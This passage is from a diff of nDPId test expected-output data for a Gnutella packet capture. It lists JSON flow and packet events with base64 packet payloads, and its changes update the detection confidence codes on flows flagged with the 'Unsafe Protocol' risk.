{"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1266,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"100.1.231.138","src_port":28681,"dst_port":56558,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":96049,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":96049,"pkt":"UlQAEjUCCAAn5uVZCABFAABtFDIAAIARzrMKAAIPZAHninAJ3O4AWZFZFoUxAuK7tbNnNS+8oB5EGUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1266,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"100.1.231.138","src_port":28681,"dst_port":56558,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1266,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"100.1.231.138","src_port":28681,"dst_port":56558,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1267,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.28.53.225","src_port":28681,"dst_port":44859,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":96049,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":96049,"pkt":"UlQAEjUCCAAn5uVZCABFAABtTdQAAIARVqAKAAIPVBw14XAJrzsAWZ3TvxoxApctlOGi4VjuIFMFmUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1267,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.28.53.225","src_port":28681,"dst_port":44859,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1267,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.28.53.225","src_port":28681,"dst_port":44859,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":3,"flow_last_seen":96404,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":96404,"pkt":"UlQAEjUCCAAn5uVZCABFAAA8c1IAAIARylsKAAIPvD00t3AJLkwAKChuYiUKBgACAwMAAAAAAAAAADEBAAkAAABHVEtHCQABAAA="} 
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1277,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":96685,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":96685,"pkt":"UlQAEjUCCAAn5uVZCABFAAA068VAAIAGCcsKAAIPXoaansRp03KjrVDkAAAAAIAC+vDifQAAAgQFtAEDAwgBAQQC"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1278,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":96685,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":96685,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0IMxAAIAG1hsKAAIPY8eUBsRoEPJVbcPeAAAAAIAC+vCBnAAAAgQFtAEDAwgBAQQC"} 
@@ -1118,17 +1118,17 @@ 01405{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1320,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":2,"flow_last_seen":100920,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":100920,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBEAAAEARxyNeNkJSCgACD\/iVcAkC34d4LkYxAuq77b+oti7DkMaMrEQAAMACAAAGR1RLRwAA+wNHJRwgXbAuWugSpAUSxJsCHL8EXjZCUviVAQAAAAR+IhyrFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 
00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.105.27","src_port":28681,"dst_port":19260,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":101122,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101122,"pkt":"UlQAEjUCCAAn5uVZCABFAABt2AwAAIARIW0KAAIPy9xpG3AJSzwAWVR20YMxAsOjfW6uj7unlpr730QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.105.27","src_port":28681,"dst_port":19260,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.105.27","src_port":28681,"dst_port":19260,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.117.249.98","src_port":28681,"dst_port":6815,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":101122,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101122,"pkt":"UlQAEjUCCAAn5uVZCABFAABt42oAAIAR9S4KAAIPXHX5YnAJGp8AWRo4clsxAgMe5rjiFfxxH3X\/E0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.117.249.98","src_port":28681,"dst_port":6815,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.117.249.98","src_port":28681,"dst_port":6815,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1452,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.64.44.11","src_port":28681,"dst_port":1352,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1452,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":101122,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101122,"pkt":"UlQAEjUCCAAn5uVZCABFAABt9MQAAIARu2EKAAIPUkAsC3AJBUgAWavKICYxAiIojdyDEATTYjr6S0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1452,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.64.44.11","src_port":28681,"dst_port":1352,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1452,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.64.44.11","src_port":28681,"dst_port":1352,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01405{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":2,"flow_last_seen":101161,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":101161,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBIEAAEAR6R9SQCwLCgACDwVIcAkC356IICYxAiIojdyDEATTYjr6S0QAAMACAAAGR1RLRwAAs3LU9XX2K5mbs3OMTMwDrBQ47bYEUkAsCwVIAQAAAASFeL+FFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrv
sa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIanw=="} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101162,"flow_last_seen":101162,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101162,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":101162,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101162,"pkt":"UlQAEjUCCAAn5uVZCABFAABte4oAAIAR7VcKAAIPLR+YcHAJaOMAWVACTGsxArv8OnSqKZfgjqpR7EQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101162,"flow_last_seen":101162,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101162,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101162,"flow_last_seen":101162,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101162,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":3,"flow_last_seen":101163,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101163,"pkt":"UlQAEjUCCAAn5uVZCABFAABtYHkAAIARZpMKAAIPtVSyEHAJ62YAWXddengxAvwV4+vWhWE2kdf1ukQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":3,"flow_last_seen":101259,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101259,"pkt":"UlQAEjUCCAAn5uVZCABFAABtBGcAAIARhQcKAAIPYEFEwnAJipkAWaF8mwwxArcB6GYWxEVcLYtOuEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 
00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1459,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":3,"flow_last_seen":101259,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101259,"pkt":"UlQAEjUCCAAn5uVZCABFAABteOQAAIAR6HIKAAIPM0SZ1nAJZo0AWYTH3zwxAjTRxsrRaTsZKs8ZWEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 
@@ -1136,13 +1136,13 @@ 01404{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":2,"flow_last_seen":101305,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":101305,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBIUAAEARodctH5hwCgACD2jjcAkC3267TGsxArv8OnSqKZfgjqpR7EQAAMACAAAGR1RLRwAAsVtn4eBIiuGjRFoZE1N3WpOAxkUELR+YcGjjAQAAAAQ+cByLFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO0dUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 
00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1479,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101837,"flow_last_seen":101837,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101837,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 